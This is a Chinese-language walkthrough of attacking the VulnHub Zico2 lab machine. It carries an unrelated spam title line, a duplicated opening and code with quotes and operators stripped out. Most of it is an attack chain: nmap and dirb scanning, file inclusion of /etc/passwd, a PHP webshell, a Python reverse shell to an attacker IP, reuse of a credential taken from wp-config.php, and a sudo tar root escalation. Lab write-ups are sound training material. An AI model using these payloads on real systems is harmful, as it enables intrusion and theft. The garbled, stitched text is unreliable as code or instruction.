建立wordpress网站,网站规划要点,自己怎么建个网站赚钱,老油条视频h5项目地址
https://download.vulnhub.com/zico/zico2.ova实验过程
将下载好的靶机导入到VMware中#xff0c;设置网络模式为NAT模式#xff0c;然后开启靶机虚拟机 使用nmap进行主机发现#xff0c;获取靶机IP地址
nmap 192.168.47.1-254根据对比可知Zico 2的一个ip地址为…项目地址
https://download.vulnhub.com/zico/zico2.ova实验过程
将下载好的靶机导入到VMware中设置网络模式为NAT模式然后开启靶机虚拟机 使用nmap进行主机发现获取靶机IP地址
nmap 192.168.47.1-254根据对比可知Zico 2的一个ip地址为192.168.47.163 扫描Zico 2的操作系统端口及对应服务
nmap -A -p- 192.168.47.163发现开放22,80和38665端口 目录扫描
dirb http://192.168.47.163访问网站 将过测试发现http://192.168.47.163/view.php?pagetools.html页面可能存在文件包含漏洞 输入page参数后输入文件名发现包含成功存在文件包含漏洞
http://192.168.47.163/view.php?page../../etc/passwd拼接/dbadmin路径发现登录界面且使用的phpLiteAdmin框架 弱口令admin登录成功 获取shell
使用searchsploit工具扫描phpLiteAdmin框架存在的漏洞 写入?php phpinfo();?之后通过文包含执行命令 被解析了说明漏洞可用
写入一句话木马
?php echo system($_GET[pass]);?反弹shell
http://192.168.47.163/view.php?page../../../../usr/databases/hacker.phppasspython -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.47.129,7272));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);psubprocess.call([/bin/sh,-i]);kali开启监听
nc -lvvp 7272反弹成功
提权
进入到/home/zico目录查看to_do.txt文件
cd /home/zico
cat to_do.txt进入到wordpress目录下发下wordpress配置文件查看此文件发现账号密码
cd wordpress
ls -al
cat wp-config.php使用ssh连接
ssh zico192.168.47.163
sWfCsfJSPV9H3AmQzw8连接成功
输入 sudo -l 查看哪些命令具有 root 权限 可以利用tar命令来进行提权
进入辅助网站tar | GTFOBins sudo tar -cf /dev/null /dev/null --checkpoint1 --checkpoint-actionexec/bin/sh提权成功